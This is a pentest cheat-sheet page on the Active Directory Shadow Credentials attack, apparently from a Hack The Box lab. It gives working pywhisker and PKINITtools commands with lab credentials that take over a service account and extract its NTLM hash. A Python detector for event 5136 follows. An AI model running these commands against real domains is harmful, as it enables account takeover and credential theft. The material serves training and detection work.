Owlglass

Pentest - Active Directory - Shadow Credentials

Shadow Credentials

pywhisker

Abuse the GenericWrite ACL to get control of an account by adding shadow credentials:

python3 /opt/pywhisker/pywhisker.py -d "certified.htb" -u "judith.mader" -p "judith09" --target "management_svc" --action "add"

The output is a PFX cert that can be used to authenticate as the user. Get a TGT for the user with PKINITtools:

python3 /opt/PKINITtools/gettgtpkinit.py -cert-pfx vGRMeeb9.pfx certified.htb/management_svc -pfx-pass '25nQ6mg4JUTeQEjjNRE2' management_svc.ccache

This creates a Kerberos ticket cache file called management_svc.ccache, which we can export. The key that this output provides can then be used with getnthash.py from the same toolkit to get the NTLM hash of the management_svc user.
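From the defender's side, adding shadow credentials is a write to the target's msDS-KeyCredentialLink attribute, which a domain controller records as Security event 5136 when Directory Service Changes auditing and a matching SACL are in place. The following is an added example, not part of the original notes or of either tool: it filters parsed 5136 records for key-credential additions by unexpected writers. The allowlisted account name, the distinguished names and the event values are constructed assumptions.

```python
VALUE_ADDED = "%%14674"  # OperationType code for "Value Added" in event 5136
# Assumption: accounts expected to write key credentials here (hypothetical name).
EXPECTED_WRITERS = {"msol_sync01"}

def cn_of(dn):
    """Return the leftmost RDN value of a distinguished name, lowercased."""
    first = dn.split(",", 1)[0]
    return first.split("=", 1)[1].lower() if "=" in first else ""

def find_shadow_credential_writes(events, expected=EXPECTED_WRITERS):
    """Return 5136 events that add a key credential from an unexpected writer."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 5136:
            continue
        if ev.get("AttributeLDAPDisplayName", "").lower() != "msds-keycredentiallink":
            continue
        if ev.get("OperationType") != VALUE_ADDED:
            continue
        writer = ev.get("SubjectUserName", "").lower()
        target = cn_of(ev.get("ObjectDN", ""))
        # A computer account updating the key on its own object is expected.
        if writer.endswith("$") and writer[:-1] == target:
            continue
        if writer in expected:
            continue
        hits.append(ev)
    return hits

# Constructed sample events (field names follow event 5136; values are made up).
KCL = "msDS-KeyCredentialLink"
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "judith.mader", "OperationType": VALUE_ADDED,
     "AttributeLDAPDisplayName": KCL,
     "ObjectDN": "CN=management_svc,CN=Users,DC=certified,DC=htb"},
    {"EventID": 5136, "SubjectUserName": "WS01$", "OperationType": VALUE_ADDED,
     "AttributeLDAPDisplayName": KCL,
     "ObjectDN": "CN=WS01,CN=Computers,DC=certified,DC=htb"},
    {"EventID": 5136, "SubjectUserName": "msol_sync01", "OperationType": VALUE_ADDED,
     "AttributeLDAPDisplayName": KCL,
     "ObjectDN": "CN=alice,CN=Users,DC=certified,DC=htb"},
    {"EventID": 5136, "SubjectUserName": "judith.mader", "OperationType": VALUE_ADDED,
     "AttributeLDAPDisplayName": "description",
     "ObjectDN": "CN=management_svc,CN=Users,DC=certified,DC=htb"},
]

if __name__ == "__main__":
    for ev in find_shadow_credential_writes(SAMPLE_EVENTS):
        print("ALERT:", ev["SubjectUserName"], "->", ev["ObjectDN"])
```

Only the first sample record is flagged: a user account adding a key credential to a different account's object.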
